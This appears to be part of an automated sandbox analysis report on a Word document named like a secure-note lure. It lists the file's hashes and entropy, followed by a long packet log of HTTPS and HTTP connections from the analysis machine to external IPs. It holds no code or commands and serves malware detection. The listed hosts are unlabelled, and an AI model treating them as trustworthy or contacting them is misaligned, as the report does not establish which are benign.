                                                                                                                            Entropy (8bit):7.844366324749551
                                                                                                                            TrID:
                                                                                                                              File name:NoteID [4962398] _Secure_Document_Mrettinger-46568.docx
                                                                                                                              File size:100'744 bytes
                                                                                                                              MD5:4ef613368d8ef55921e44d21e92b817a
                                                                                                                              SHA1:11b679e827ded5df7e6b115800cfe79847fbba5b
                                                                                                                              SHA256:31712310b311a29b04380f8056ae5123b413a43f9eda5d399997d4da9f143d79
                                                                                                                              SHA512:6cd7fa5c9fa337fea786b8e40fad9631f2cdfbe66fe1585669abc6adf6e374a1f9f5faa5fb3fc33c2ab4d8e8101d903649b32b129e8a5dd82eb48c6a2fd8e869
                                                                                                                              SSDEEP:3072:phMDIDDhBhDsdoDsjhLhnFDkW/hD3hs3/JDf2M2hMDIDDhBhDsdoDsjhLhIDFDkf:phMDIDDhBhDsdoDsjhLhnFDkW/hD3hsT
                                                                                                                              TLSH:65A3463780F41624B6155AA0BC4FFE1FE82543F1418B96362ECAF8D8D6BEE8D020DB55
                                                                                                                              File Content Preview:PK.............................................................................................................................................................................................................................................................
                                                                                                                              Icon Hash:35e5c48caa8a8599
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 18, 2024 17:55:19.094255924 CET49678443192.168.2.17204.79.197.200
                                                                                                                              Nov 18, 2024 17:55:19.094312906 CET49677443192.168.2.17204.79.197.200
                                                                                                                              Nov 18, 2024 17:55:19.094317913 CET49676443192.168.2.17204.79.197.200
                                                                                                                              Nov 18, 2024 17:55:26.355154037 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:26.355200052 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:26.355305910 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:26.356863976 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:26.356885910 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.500673056 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.500768900 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:27.541162014 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:27.541198969 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.541553020 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.542943001 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:27.543071985 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:27.543102026 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.919280052 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.919308901 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.919361115 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.919409990 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:27.919409990 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:27.919481039 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.920018911 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:27.920018911 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:27.920211077 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.920243025 CET4434970040.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:27.920296907 CET49700443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:28.025754929 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:28.025852919 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:28.025973082 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:28.026139975 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:28.026173115 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.157607079 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.158529043 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.158572912 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.162887096 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.162903070 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.162944078 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.162955046 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.551237106 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.551263094 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.551467896 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.551513910 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.551549911 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.551654100 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.551857948 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.551876068 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.551919937 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.552077055 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.552109003 CET4434970240.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.552154064 CET49702443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.558511019 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:29.558559895 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.558654070 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:29.560071945 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:29.560098886 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.600884914 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.600931883 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:29.601025105 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.601286888 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:29.601300955 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.369528055 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.369715929 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.371568918 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.371599913 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.371923923 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.418308020 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.432689905 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.475374937 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.694849968 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.694874048 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.694883108 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.694896936 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.694926023 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.694961071 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.694992065 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.695009947 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.695043087 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.698215008 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.698280096 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.698298931 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.698348045 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.699626923 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.699693918 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:30.702150106 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:30.702171087 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.702387094 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.702840090 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:30.702902079 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:30.702936888 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.706784010 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.706808090 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:30.706821918 CET49703443192.168.2.17172.202.163.200
                                                                                                                              Nov 18, 2024 17:55:30.706828117 CET44349703172.202.163.200192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:31.128881931 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:31.128906012 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:31.128952980 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:31.128998041 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:31.129028082 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:31.129048109 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:31.129512072 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:31.129554033 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:31.129671097 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:31.129698038 CET4434970440.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:31.129757881 CET49704443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:31.188678026 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:31.188764095 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:31.188874960 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:31.189079046 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:31.189112902 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.298217058 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.298995972 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:32.299035072 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.299832106 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:32.299838066 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.299871922 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:32.299882889 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.659082890 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.659121037 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.659166098 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.659195900 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:32.659225941 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.659269094 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:32.659693003 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:32.659699917 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.659718037 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:32.659868956 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.659900904 CET4434970640.126.32.68192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:32.659954071 CET49706443192.168.2.1740.126.32.68
                                                                                                                              Nov 18, 2024 17:55:33.713810921 CET49675443192.168.2.17204.79.197.203
                                                                                                                              Nov 18, 2024 17:55:34.016392946 CET49675443192.168.2.17204.79.197.203
                                                                                                                              Nov 18, 2024 17:55:34.623428106 CET49675443192.168.2.17204.79.197.203
                                                                                                                              Nov 18, 2024 17:55:35.836327076 CET49675443192.168.2.17204.79.197.203
                                                                                                                              Nov 18, 2024 17:55:37.897164106 CET49680443192.168.2.1720.189.173.13
                                                                                                                              Nov 18, 2024 17:55:38.204307079 CET49680443192.168.2.1720.189.173.13
                                                                                                                              Nov 18, 2024 17:55:38.236469984 CET49675443192.168.2.17204.79.197.203
                                                                                                                              Nov 18, 2024 17:55:38.808453083 CET49680443192.168.2.1720.189.173.13
                                                                                                                              Nov 18, 2024 17:55:39.925004005 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:39.925055981 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:39.925529957 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:39.925618887 CET49719443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:39.925662994 CET4434971934.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:39.925755024 CET49719443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:39.925977945 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:39.925996065 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:39.926141024 CET49719443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:39.926161051 CET4434971934.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.023332119 CET49680443192.168.2.1720.189.173.13
                                                                                                                              Nov 18, 2024 17:55:40.649075985 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.649729967 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.649746895 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.651426077 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.651576042 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.654278040 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.654370070 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.654675961 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.654691935 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.655445099 CET4434971934.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.655632973 CET49719443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.655662060 CET4434971934.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.657145977 CET4434971934.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.657205105 CET49719443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.658282042 CET49719443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.658360004 CET4434971934.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.694363117 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.710325003 CET49719443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.710342884 CET4434971934.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.757289886 CET49719443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.842756033 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.843056917 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.843166113 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.843533993 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.843533993 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:40.843555927 CET4434971834.168.114.70192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.843883991 CET49718443192.168.2.1734.168.114.70
                                                                                                                              Nov 18, 2024 17:55:41.329623938 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:41.329663038 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:41.329749107 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:41.330210924 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:41.330231905 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.393465996 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.393790007 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.393804073 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.396054983 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.396141052 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.397377968 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.397526026 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.397553921 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.438342094 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.438379049 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.438435078 CET49680443192.168.2.1720.189.173.13
                                                                                                                              Nov 18, 2024 17:55:42.485368013 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.751034021 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.751156092 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.751301050 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.752191067 CET49720443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.752211094 CET44349720103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.755462885 CET49722443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.755496025 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:42.755672932 CET49722443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.756285906 CET49722443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:42.756299973 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:43.042362928 CET49675443192.168.2.17204.79.197.203
                                                                                                                              Nov 18, 2024 17:55:43.976778984 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:43.977077961 CET49722443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:43.977096081 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:43.977447033 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:43.977806091 CET49722443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:43.977870941 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:43.977950096 CET49722443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:44.023339987 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.104244947 CET49723443192.168.2.17142.250.186.164
                                                                                                                              Nov 18, 2024 17:55:44.104310989 CET44349723142.250.186.164192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.104482889 CET49723443192.168.2.17142.250.186.164
                                                                                                                              Nov 18, 2024 17:55:44.104789972 CET49723443192.168.2.17142.250.186.164
                                                                                                                              Nov 18, 2024 17:55:44.104809999 CET44349723142.250.186.164192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.328295946 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.328417063 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.328497887 CET49722443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:44.329145908 CET49722443192.168.2.17103.134.152.12
                                                                                                                              Nov 18, 2024 17:55:44.329164028 CET44349722103.134.152.12192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.724240065 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:44.724284887 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.724523067 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:44.724884033 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:44.724929094 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.724999905 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:44.725095034 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:44.725112915 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.725243092 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:44.725260973 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.047188997 CET44349723142.250.186.164192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.047585964 CET49723443192.168.2.17142.250.186.164
                                                                                                                              Nov 18, 2024 17:55:45.047600985 CET44349723142.250.186.164192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.049124956 CET44349723142.250.186.164192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.049202919 CET49723443192.168.2.17142.250.186.164
                                                                                                                              Nov 18, 2024 17:55:45.050144911 CET49723443192.168.2.17142.250.186.164
                                                                                                                              Nov 18, 2024 17:55:45.050230980 CET44349723142.250.186.164192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.093362093 CET49723443192.168.2.17142.250.186.164
                                                                                                                              Nov 18, 2024 17:55:45.093377113 CET44349723142.250.186.164192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.141376972 CET49723443192.168.2.17142.250.186.164
                                                                                                                              Nov 18, 2024 17:55:45.541198015 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.541840076 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.542186975 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.542216063 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.542392969 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.542432070 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.543556929 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.543632984 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.543709993 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.543781996 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.544687033 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.544759035 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.544775963 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.544842958 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.544920921 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.544939041 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.587361097 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.587371111 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.587376118 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.639966965 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.732002020 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.732026100 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.732105970 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.732104063 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.732158899 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.734513044 CET49724443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:45.734553099 CET44349724208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.759416103 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:45.759448051 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.759504080 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:45.759723902 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:45.759740114 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.337837934 CET4968280192.168.2.17192.229.211.108
                                                                                                                              Nov 18, 2024 17:55:46.439809084 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.440152884 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.440175056 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.441256046 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.441399097 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.442466974 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.442540884 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.442586899 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.487325907 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.497376919 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.497409105 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.545423985 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.603903055 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.603976965 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.604218960 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.604397058 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.604397058 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.604419947 CET44349726104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.604480982 CET49726443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.606085062 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.606126070 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.606216908 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.606457949 CET49727443192.168.2.17104.18.95.41
                                                                                                                              Nov 18, 2024 17:55:46.606472015 CET44349727104.18.95.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:46.641388893 CET4968280192.168.2.17192.229.211.108
                                                                                                                              Nov 18, 2024 17:55:47.247380972 CET4968280192.168.2.17192.229.211.108
